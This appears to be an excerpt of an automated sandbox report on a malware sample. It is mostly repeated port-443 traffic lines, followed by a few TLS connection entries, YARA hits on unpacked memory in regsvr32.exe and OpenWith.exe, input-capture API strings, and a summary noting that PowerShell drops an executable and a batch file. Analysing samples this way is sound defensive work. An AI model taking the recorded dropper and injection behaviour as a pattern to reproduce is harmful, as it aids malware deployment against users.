                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56014
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55160
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55923 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52219 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52164 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55466 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55636 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56257
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56499
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56016
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56258
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52555 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55176
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56240 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55178
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54089
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56070 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52142 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53076 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52198 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56033
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56275
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56034
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56277
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54676 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53467 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54091
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54588 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54846 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52246 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52999
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54934
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55432 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52997
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54932
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55484 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52172 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54141 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56162 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56053 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54193 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55450 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52529
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52504 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56127 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54439 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52160 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52531
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55500 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54955
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53623
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54954
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53621
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54091 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53336 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52687 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52234 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54547 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52373 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55811
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52194 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55812
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52149 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53361 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54955 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55380 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54525 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56368 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54267 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52162 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53803
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53883 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52477 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56088
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53232 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54289 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54696 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55104 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55534 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52222 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52348 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52196 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52210 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52150 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53465 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55382 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56090 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56090
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52244 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54912
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52139 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53829
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52971
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54911
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52972
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54195 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52503
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52184 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53700 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53831
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55568 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54116 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56534 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56033 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56220 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52239
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54418
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52233
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54654
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52234
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54653
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52231
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52232
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52237
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52479
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53569
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54416
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52238
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52235
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52477
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55500
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52236
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53311 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52240
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52241
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53571
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56107 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54568 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52203 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53024 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56554 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52375 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55518
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52244
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55997
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52245
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54911 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52243
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55516
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52248
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52246
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53336
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52247
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53335
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55996
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52181 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54418 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55940 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56314 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55126 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54439
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52158 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52947 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52296 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56257 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53103
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54676
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52215 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53101
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54674
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54438
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56051 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56164 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56221 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54063 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52237 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53596
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53595
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55618 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54168 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55533
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52269
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53517 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55534
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53363
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52271
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53361
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55550 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56014 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54395 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54610
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55942
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52213 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55262 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55940
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54611
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52208
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52209
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54869
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52207
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55959
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52200
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52201
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52685
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52204
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52205
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52202
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52203
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52687
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52171 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55996 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53335 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52225 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52219
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53309
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52217
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52218
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53621 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52211
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53543
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52212
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54631
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52451
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52193 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52210
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52452
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52215
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55960
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52216
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52213
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52214
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53544
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54633
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52400 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52148 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55905 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52228
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52229
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53699 -> 443
                        Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
                        Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_46571554-c
                        Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_cc88e3cb-2
                        Source: Yara matchFile source: 7.3.regsvr32.exe.1c9a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd877d5168.87.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd87b10000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd87830000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.regsvr32.exe.1c6c0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd87b10000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd87830000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.regsvr32.exe.1c9a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1316, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

                        System Summary

                        barindex
                        Powershell drops PE file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\utox_x86_x64.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to dropped file
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E947000 NtWriteFile,WaitForSingleObject,3_2_00007FF79E947000
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E946EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,3_2_00007FF79E946EE0
